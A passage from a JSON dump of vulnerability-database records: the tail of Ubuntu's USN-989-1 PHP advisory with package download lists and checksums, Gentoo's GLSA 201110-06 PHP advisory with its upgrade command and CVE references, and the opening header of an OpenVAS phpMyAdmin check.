http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-tidy_5.3.2-1ubuntu4.5_amd64.deb\r\n Size/MD5: 18280 b8d973924d325795d972fa355d1c1c53\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-xmlrpc_5.3.2-1ubuntu4.5_amd64.deb\r\n Size/MD5: 34800 fec582d9694a7a1de947dae2fefda9b9\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-xsl_5.3.2-1ubuntu4.5_amd64.deb\r\n Size/MD5: 13364 8769f873c77c2836916f02c1982ded46\r\n http://security.ubuntu.com/ubuntu/pool/universe/p/php5/libapache2-mod-php5filter_5.3.2-1ubuntu4.5_amd64.deb\r\n Size/MD5: 2986954 97266c17ebf6000c272d6756b97de6e7\r\n http://security.ubuntu.com/ubuntu/pool/universe/p/php5/php5-enchant_5.3.2-1ubuntu4.5_amd64.deb\r\n Size/MD5: 8948 d4da189a14a254a71abd6812ff899399\r\n http://security.ubuntu.com/ubuntu/pool/universe/p/php5/php5-intl_5.3.2-1ubuntu4.5_amd64.deb\r\n Size/MD5: 59380 3ebee38d8a75a05d12712d3d60b937c4\r\n\r\n i386 architecture (x86 compatible Intel/AMD):\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/libapache2-mod-php5_5.3.2-1ubuntu4.5_i386.deb\r\n Size/MD5: 2833114 b04215051dcadfdc06e2513f70ed433b\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-cgi_5.3.2-1ubuntu4.5_i386.deb\r\n Size/MD5: 5622834 423197eff8efaa375863ce5535adf560\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-cli_5.3.2-1ubuntu4.5_i386.deb\r\n Size/MD5: 2814840 f82ebe6349a5ebe918723086c1302a7e\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-common_5.3.2-1ubuntu4.5_i386.deb\r\n Size/MD5: 542322 38602836ba5ac1ca3cabace1ce023941\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-curl_5.3.2-1ubuntu4.5_i386.deb\r\n Size/MD5: 25614 689e85bea98c62173940859c421bc4f7\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-dbg_5.3.2-1ubuntu4.5_i386.deb\r\n Size/MD5: 10558110 e1e88b747269c57f419b8bc422236ed7\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-dev_5.3.2-1ubuntu4.5_i386.deb\r\n Size/MD5: 404856 571a3ad11374230f259c91f6a728fc75\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-gd_5.3.2-1ubuntu4.5_i386.deb\r\n Size/MD5: 34750 a69456405baec0d821d61ab0924bda52\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-gmp_5.3.2-1ubuntu4.5_i386.deb\r\n Size/MD5: 14232 cff0b73639ff134e4152b1990fdb40c6\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-ldap_5.3.2-1ubuntu4.5_i386.deb\r\n Size/MD5: 17562 6748871e9f5e49bcf3218407dfec0629\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-mysql_5.3.2-1ubuntu4.5_i386.deb\r\n Size/MD5: 64222 925151a8a99ec8106b1e27565925c6b9\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-odbc_5.3.2-1ubuntu4.5_i386.deb\r\n Size/MD5: 32090 bc74344f2d4b41372d8c27d8fbde5400\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-pgsql_5.3.2-1ubuntu4.5_i386.deb\r\n Size/MD5: 52002 6ca286ebc084b7cdc3b5a625386514f3\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-pspell_5.3.2-1ubuntu4.5_i386.deb\r\n Size/MD5: 7272 0a0d2cee4d82e255244bd10b8fc00830\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-recode_5.3.2-1ubuntu4.5_i386.deb\r\n Size/MD5: 4150 184e379a084bff76e26f49362ab06823\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-snmp_5.3.2-1ubuntu4.5_i386.deb\r\n Size/MD5: 10278 5b11ef6ee3ff6f1aab979313ef0d6c79\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-sqlite_5.3.2-1ubuntu4.5_i386.deb\r\n Size/MD5: 46664 78028a964622b0d4953949d4ee9826e7\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-sybase_5.3.2-1ubuntu4.5_i386.deb\r\n Size/MD5: 23642 5c8e1baa246c888d4b3378ee4f0f2680\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-tidy_5.3.2-1ubuntu4.5_i386.deb\r\n Size/MD5: 16382 8c495d4d032f7e0425a43b65ea7e3d7b\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-xmlrpc_5.3.2-1ubuntu4.5_i386.deb\r\n Size/MD5: 31946 8911b282d36c22d8bb9b28e55217c57c\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-xsl_5.3.2-1ubuntu4.5_i386.deb\r\n Size/MD5: 12344 24302b7d74181d100d8f6a66540175a7\r\n http://security.ubuntu.com/ubuntu/pool/universe/p/php5/libapache2-mod-php5filter_5.3.2-1ubuntu4.5_i386.deb\r\n Size/MD5: 2832036 bed542d053ab458ed10932843dcdf0e6\r\n http://security.ubuntu.com/ubuntu/pool/universe/p/php5/php5-enchant_5.3.2-1ubuntu4.5_i386.deb\r\n Size/MD5: 7762 85f2943e32dcbfd182117483796dacec\r\n http://security.ubuntu.com/ubuntu/pool/universe/p/php5/php5-intl_5.3.2-1ubuntu4.5_i386.deb\r\n Size/MD5: 53716 18c7752cae120985efba2a3ae6a25a66\r\n\r\n powerpc architecture (Apple Macintosh G3/G4/G5):\r\n\r\n http://ports.ubuntu.com/pool/main/p/php5/libapache2-mod-php5_5.3.2-1ubuntu4.5_powerpc.deb\r\n Size/MD5: 2982464 edf78994dd03526c1b82d74e1f318690\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-cgi_5.3.2-1ubuntu4.5_powerpc.deb\r\n Size/MD5: 5771102 4d2e9891c86b28d690fe91a80a99c292\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-cli_5.3.2-1ubuntu4.5_powerpc.deb\r\n Size/MD5: 2890310 952c32e1fcaa7ef1b5650b2979d699d5\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-common_5.3.2-1ubuntu4.5_powerpc.deb\r\n Size/MD5: 551158 a88d1105e75195f703a4d483dcebd44e\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-curl_5.3.2-1ubuntu4.5_powerpc.deb\r\n Size/MD5: 28374 554270ce5b80052b9803bcc25571f453\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-dbg_5.3.2-1ubuntu4.5_powerpc.deb\r\n Size/MD5: 11208842 63f87872d09e80692e8251aa4f2df04d\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-dev_5.3.2-1ubuntu4.5_powerpc.deb\r\n Size/MD5: 404920 e27e87870a2cb324055be1d662ea5b17\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-gd_5.3.2-1ubuntu4.5_powerpc.deb\r\n Size/MD5: 39870 795c1525e7b307bf6cbe6b3917baf6fe\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-gmp_5.3.2-1ubuntu4.5_powerpc.deb\r\n Size/MD5: 14338 df9d9c09b1069e0f1945ad382eba1f44\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-ldap_5.3.2-1ubuntu4.5_powerpc.deb\r\n Size/MD5: 19164 c885ee0ecf4f52fbbb2cd7bfbf75bcd7\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-mysql_5.3.2-1ubuntu4.5_powerpc.deb\r\n Size/MD5: 68998 ce747c080a6824326c060fe14a98248e\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-odbc_5.3.2-1ubuntu4.5_powerpc.deb\r\n Size/MD5: 33942 2474ab65b1f6eac1f919a486cd264f6f\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-pgsql_5.3.2-1ubuntu4.5_powerpc.deb\r\n Size/MD5: 55474 395e4c0305dacc0aa71db9bc196b2044\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-pspell_5.3.2-1ubuntu4.5_powerpc.deb\r\n Size/MD5: 7488 6444ed22ff69ece5305e96a9927d3420\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-recode_5.3.2-1ubuntu4.5_powerpc.deb\r\n Size/MD5: 4388 eaf00c1aa48a9053960b1c4797ce9060\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-snmp_5.3.2-1ubuntu4.5_powerpc.deb\r\n Size/MD5: 10736 00aa32b129f319efe56146cfda5e9f5f\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-sqlite_5.3.2-1ubuntu4.5_powerpc.deb\r\n Size/MD5: 51990 22b99cb703a3f1f4da89eb84aecb6bb6\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-sybase_5.3.2-1ubuntu4.5_powerpc.deb\r\n Size/MD5: 24770 09a88f4f159e5b6856ee751c01b9aadb\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-tidy_5.3.2-1ubuntu4.5_powerpc.deb\r\n Size/MD5: 17836 b64e7de3ec97cb03e39122073eed4d43\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-xmlrpc_5.3.2-1ubuntu4.5_powerpc.deb\r\n Size/MD5: 34088 5396bef4993cfd5de11b870435db88b3\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-xsl_5.3.2-1ubuntu4.5_powerpc.deb\r\n Size/MD5: 13300 89dc76ebac08c9502403d760f95c9e69\r\n http://ports.ubuntu.com/pool/universe/p/php5/libapache2-mod-php5filter_5.3.2-1ubuntu4.5_powerpc.deb\r\n Size/MD5: 2981990 a2876e32a2bc43aea98770941e45b66d\r\n http://ports.ubuntu.com/pool/universe/p/php5/php5-enchant_5.3.2-1ubuntu4.5_powerpc.deb\r\n Size/MD5: 8300 6dd12260de8c626e34b611b762b04f6c\r\n http://ports.ubuntu.com/pool/universe/p/php5/php5-intl_5.3.2-1ubuntu4.5_powerpc.deb\r\n Size/MD5: 60434 7b2a0b9d20ade9252980a705daaf47e7\r\n\r\n sparc architecture (Sun SPARC/UltraSPARC):\r\n\r\n http://ports.ubuntu.com/pool/main/p/php5/libapache2-mod-php5_5.3.2-1ubuntu4.5_sparc.deb\r\n Size/MD5: 2894334 925c72e64cd430b72674a4d7a7e0fbe7\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-cgi_5.3.2-1ubuntu4.5_sparc.deb\r\n Size/MD5: 5644716 18b645085fd79b22dd0cd3e259fc033f\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-cli_5.3.2-1ubuntu4.5_sparc.deb\r\n Size/MD5: 2825874 622bf4dd6249ab27084c14074b07f6e5\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-common_5.3.2-1ubuntu4.5_sparc.deb\r\n Size/MD5: 546864 48a398ae6e4e6cbec5bb3318a900e99a\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-curl_5.3.2-1ubuntu4.5_sparc.deb\r\n Size/MD5: 27078 b4aa6fb52c3d12f6205d59acc8bb7df7\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-dbg_5.3.2-1ubuntu4.5_sparc.deb\r\n Size/MD5: 10616814 63490bf4385f5c95ba9c03f26f7d9b1c\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-dev_5.3.2-1ubuntu4.5_sparc.deb\r\n Size/MD5: 404900 78bc30c48a03521ea6a4840093c7efc1\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-gd_5.3.2-1ubuntu4.5_sparc.deb\r\n Size/MD5: 36728 c298bbce65f1a5bf9c42c367ef30a861\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-gmp_5.3.2-1ubuntu4.5_sparc.deb\r\n Size/MD5: 13432 29d609d21cff39d809a931ebfa39625b\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-ldap_5.3.2-1ubuntu4.5_sparc.deb\r\n Size/MD5: 17410 3218b21b576e171dc9a6f773b57cc691\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-mysql_5.3.2-1ubuntu4.5_sparc.deb\r\n Size/MD5: 62090 e7223bbff3572940b60bf7c2eb18f9df\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-odbc_5.3.2-1ubuntu4.5_sparc.deb\r\n Size/MD5: 30938 d21c73748b899baf596daf0834ebeab4\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-pgsql_5.3.2-1ubuntu4.5_sparc.deb\r\n Size/MD5: 50518 b0d23e8fdce9c786f98db67e43eef1ff\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-pspell_5.3.2-1ubuntu4.5_sparc.deb\r\n Size/MD5: 7148 458ed08225f5967d3ab4c65f5fad2985\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-recode_5.3.2-1ubuntu4.5_sparc.deb\r\n Size/MD5: 4144 5fd1ba0857e51bd373ceb95b18f50736\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-snmp_5.3.2-1ubuntu4.5_sparc.deb\r\n Size/MD5: 10802 1f876015e91d4165f11ff328488f14c1\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-sqlite_5.3.2-1ubuntu4.5_sparc.deb\r\n Size/MD5: 46576 19cc5dc35fb1c3aba75e4dce3c1dbde0\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-sybase_5.3.2-1ubuntu4.5_sparc.deb\r\n Size/MD5: 22934 8ec1181656a28c7d903649c8773711f4\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-tidy_5.3.2-1ubuntu4.5_sparc.deb\r\n Size/MD5: 16882 9414b5d7bd0c7bcb46be22b47082563b\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-xmlrpc_5.3.2-1ubuntu4.5_sparc.deb\r\n Size/MD5: 32176 2f63f169a505740fe94d3219421ad24a\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-xsl_5.3.2-1ubuntu4.5_sparc.deb\r\n Size/MD5: 12110 11304d2ccdfc9d9e1e67b39ab969f436\r\n http://ports.ubuntu.com/pool/universe/p/php5/libapache2-mod-php5filter_5.3.2-1ubuntu4.5_sparc.deb\r\n Size/MD5: 2893010 b77583cdabf04a58f35b9a45e6effaec\r\n http://ports.ubuntu.com/pool/universe/p/php5/php5-enchant_5.3.2-1ubuntu4.5_sparc.deb\r\n Size/MD5: 7492 8ab97bc42f7cab07f15fa053687b38da\r\n http://ports.ubuntu.com/pool/universe/p/php5/php5-intl_5.3.2-1ubuntu4.5_sparc.deb\r\n Size/MD5: 53994 1b3aa7b8aca7c93f77ce3014440a4bfc\r\n\r\n\r\n", "cvss3": {}, "published": "2010-09-27T00:00:00", "type": "securityvulns", "title": "[USN-989-1] PHP vulnerabilities", "bulletinFamily": "software", "hackapp": {}, "cvss2": {}, "cvelist": ["CVE-2010-1129", "CVE-2010-2225", "CVE-2010-1868", "CVE-2010-2531", "CVE-2010-3065", "CVE-2010-1866", "CVE-2010-2094", "CVE-2010-1130", "CVE-2010-2950", "CVE-2010-1917", "CVE-2010-1128", "CVE-2010-0397"], "modified": "2010-09-27T00:00:00", "id": "SECURITYVULNS:DOC:24800", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:24800", "sourceData": "", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:42", "description": "- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\r\nGentoo Linux Security Advisory GLSA 201110-06\r\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\r\n http://security.gentoo.org/\r\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\r\n\r\n Severity: High\r\n Title: PHP: Multiple vulnerabilities\r\n Date: October 10, 2011\r\n Bugs: #306939, #332039, #340807, #350908, #355399, #358791,\r\n #358975, #369071, #372745, #373965, #380261\r\n ID: 201110-06\r\n\r\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\r\n\r\nSynopsis\r\n========\r\n\r\nMultiple vulnerabilities were found in PHP, the worst of which leading\r\nto remote execution of arbitrary code.\r\n\r\nBackground\r\n==========\r\n\r\nPHP is a widely-used general-purpose scripting language that is\r\nespecially suited for Web development and can be embedded into HTML.\r\n\r\nAffected packages\r\n=================\r\n\r\n -------------------------------------------------------------------\r\n Package / Vulnerable / Unaffected\r\n -------------------------------------------------------------------\r\n 1 dev-lang/php < 5.3.8 >= 5.3.8\r\n\r\nDescription\r\n===========\r\n\r\nMultiple vulnerabilities have been discovered in PHP. Please review the\r\nCVE identifiers referenced below for details.\r\n\r\nImpact\r\n======\r\n\r\nA context-dependent attacker could execute arbitrary code, obtain\r\nsensitive information from process memory, bypass intended access\r\nrestrictions, or cause a Denial of Service in various ways.\r\n\r\nA remote attacker could cause a Denial of Service in various ways,\r\nbypass spam detections, or bypass open_basedir restrictions.\r\n\r\nWorkaround\r\n==========\r\n\r\nThere is no known workaround at this time.\r\n\r\nResolution\r\n==========\r\n\r\nAll PHP users should upgrade to the latest version:\r\n\r\n # emerge --sync\r\n # emerge --ask --oneshot --verbose ">=dev-lang/php-5.3.8"\r\n\r\nReferences\r\n==========\r\n\r\n[ 1 ] CVE-2006-7243\r\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2006-7243\r\n[ 2 ] CVE-2009-5016\r\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-5016\r\n[ 3 ] CVE-2010-1128\r\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1128\r\n[ 4 ] CVE-2010-1129\r\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1129\r\n[ 5 ] CVE-2010-1130\r\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1130\r\n[ 6 ] CVE-2010-1860\r\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1860\r\n[ 7 ] CVE-2010-1861\r\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1861\r\n[ 8 ] CVE-2010-1862\r\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1862\r\n[ 9 ] CVE-2010-1864\r\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1864\r\n[ 10 ] CVE-2010-1866\r\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1866\r\n[ 11 ] CVE-2010-1868\r\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1868\r\n[ 12 ] CVE-2010-1914\r\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1914\r\n[ 13 ] CVE-2010-1915\r\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1915\r\n[ 14 ] CVE-2010-1917\r\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1917\r\n[ 15 ] CVE-2010-2093\r\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2093\r\n[ 16 ] CVE-2010-2094\r\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2094\r\n[ 17 ] CVE-2010-2097\r\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2097\r\n[ 18 ] CVE-2010-2100\r\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2100\r\n[ 19 ] CVE-2010-2101\r\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2101\r\n[ 20 ] CVE-2010-2190\r\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2190\r\n[ 21 ] CVE-2010-2191\r\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2191\r\n[ 22 ] CVE-2010-2225\r\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2225\r\n[ 23 ] CVE-2010-2484\r\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2484\r\n[ 24 ] CVE-2010-2531\r\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2531\r\n[ 25 ] CVE-2010-2950\r\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2950\r\n[ 26 ] CVE-2010-3062\r\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3062\r\n[ 27 ] CVE-2010-3063\r\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3063\r\n[ 28 ] CVE-2010-3064\r\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3064\r\n[ 29 ] CVE-2010-3065\r\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3065\r\n[ 30 ] CVE-2010-3436\r\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3436\r\n[ 31 ] CVE-2010-3709\r\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3709\r\n[ 32 ] CVE-2010-3709\r\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3709\r\n[ 33 ] CVE-2010-3710\r\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3710\r\n[ 34 ] CVE-2010-3710\r\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3710\r\n[ 35 ] CVE-2010-3870\r\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3870\r\n[ 36 ] CVE-2010-4150\r\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4150\r\n[ 37 ] CVE-2010-4409\r\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4409\r\n[ 38 ] CVE-2010-4645\r\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4645\r\n[ 39 ] CVE-2010-4697\r\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4697\r\n[ 40 ] CVE-2010-4698\r\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4698\r\n[ 41 ] CVE-2010-4699\r\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4699\r\n[ 42 ] CVE-2010-4700\r\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4700\r\n[ 43 ] CVE-2011-0420\r\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0420\r\n[ 44 ] CVE-2011-0421\r\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0421\r\n[ 45 ] CVE-2011-0708\r\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0708\r\n[ 46 ] CVE-2011-0752\r\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0752\r\n[ 47 ] CVE-2011-0753\r\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0753\r\n[ 48 ] CVE-2011-0755\r\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0755\r\n[ 49 ] CVE-2011-1092\r\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-1092\r\n[ 50 ] CVE-2011-1148\r\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-1148\r\n[ 51 ] CVE-2011-1153\r\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-1153\r\n[ 52 ] CVE-2011-1464\r\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-1464\r\n[ 53 ] CVE-2011-1466\r\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-1466\r\n[ 54 ] CVE-2011-1467\r\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-1467\r\n[ 55 ] CVE-2011-1468\r\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-1468\r\n[ 56 ] CVE-2011-1469\r\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-1469\r\n[ 57 ] CVE-2011-1470\r\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-1470\r\n[ 58 ] CVE-2011-1471\r\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-1471\r\n[ 59 ] CVE-2011-1657\r\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-1657\r\n[ 60 ] CVE-2011-1938\r\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-1938\r\n[ 61 ] CVE-2011-2202\r\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2202\r\n[ 62 ] CVE-2011-2483\r\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2483\r\n[ 63 ] CVE-2011-3182\r\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3182\r\n[ 64 ] CVE-2011-3189\r\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3189\r\n[ 65 ] CVE-2011-3267\r\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3267\r\n[ 66 ] CVE-2011-3268\r\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3268\r\n\r\nAvailability\r\n============\r\n\r\nThis GLSA and any updates to it are available for viewing at\r\nthe Gentoo Security Website:\r\n\r\n http://security.gentoo.org/glsa/glsa-201110-06.xml\r\n\r\nConcerns?\r\n=========\r\n\r\nSecurity is a primary focus of Gentoo Linux and ensuring the\r\nconfidentiality and security of our users' machines is of utmost\r\nimportance to us. Any security concerns should be addressed to\r\nsecurity@gentoo.org or alternatively, you may file a bug at\r\nhttps://bugs.gentoo.org.\r\n\r\nLicense\r\n=======\r\n\r\nCopyright 2011 Gentoo Foundation, Inc; referenced text\r\nbelongs to its owner(s).\r\n\r\nThe contents of this document are licensed under the\r\nCreative Commons - Attribution / Share Alike license.\r\n\r\nhttp://creativecommons.org/licenses/by-sa/2.5\r\n", "cvss3": {}, "published": "2011-10-12T00:00:00", "type": "securityvulns", "title": "[ GLSA 201110-06 ] PHP: Multiple vulnerabilities", "bulletinFamily": "software", "hackapp": {}, "cvss2": {}, "cvelist": ["CVE-2011-0421", "CVE-2011-0752", "CVE-2011-1467", "CVE-2011-1153", "CVE-2011-1471", "CVE-2010-1129", "CVE-2010-2225", "CVE-2010-1868", "CVE-2011-1148", "CVE-2010-2484", "CVE-2010-2097", "CVE-2011-1466", "CVE-2010-2531", "CVE-2011-3189", "CVE-2010-3065", "CVE-2010-2191", "CVE-2011-1938", "CVE-2010-4697", "CVE-2010-1866", "CVE-2010-1915", "CVE-2011-1092", "CVE-2010-4698", "CVE-2011-2483", "CVE-2006-7243", "CVE-2011-0753", "CVE-2010-4645", "CVE-2010-3436", "CVE-2010-2093", "CVE-2011-1657", "CVE-2011-0708", "CVE-2010-3870", "CVE-2011-3268", "CVE-2010-1861", "CVE-2010-2190", "CVE-2010-3063", "CVE-2011-3182", "CVE-2010-2101", "CVE-2011-1468", "CVE-2011-0420", "CVE-2010-3062", "CVE-2010-1914", "CVE-2011-1470", "CVE-2010-1860", "CVE-2010-2094", "CVE-2010-3709", "CVE-2010-3064", "CVE-2011-1469", "CVE-2009-5016", "CVE-2011-3267", "CVE-2010-3710", "CVE-2010-4150", "CVE-2011-1464", "CVE-2011-0755", "CVE-2010-4699", "CVE-2010-1130", "CVE-2010-2100", "CVE-2011-2202", "CVE-2010-2950", "CVE-2010-4700", "CVE-2010-1917", "CVE-2010-1128", "CVE-2010-1864", "CVE-2010-4409", "CVE-2010-1862"], "modified": "2011-10-12T00:00:00", "id": "SECURITYVULNS:DOC:27147", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:27147", "sourceData": "", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "openvas": [{"lastseen": "2019-05-29T18:39:37", "description": "The remote host is missing an update to the system\n as announced in the referenced advisory.", "cvss3": {}, "published": "2011-08-03T00:00:00", "type": "openvas", "title": "FreeBSD Ports: phpmyadmin", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-2508", "CVE-2011-2505", "CVE-2011-2506", "CVE-2011-2507"], "modified": "2018-10-05T00:00:00", "id": "OPENVAS:136141256231069995", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231069995", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: freebsd_phpmyadmin11.nasl 11762 2018-10-05 10:54:12Z cfischer $\n#\n# Auto generated from VID 7e4e5c53-a56c-11e0-b180-00216aa06fc2\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2011 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.69995\");\n script_version(\"$Revision: 11762 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-05 12:54:12 +0200 (Fri, 05 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2011-08-03 04:36:20 +0200 (Wed, 03 Aug 2011)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_cve_id(\"CVE-2011-2505\", \"CVE-2011-2506\", 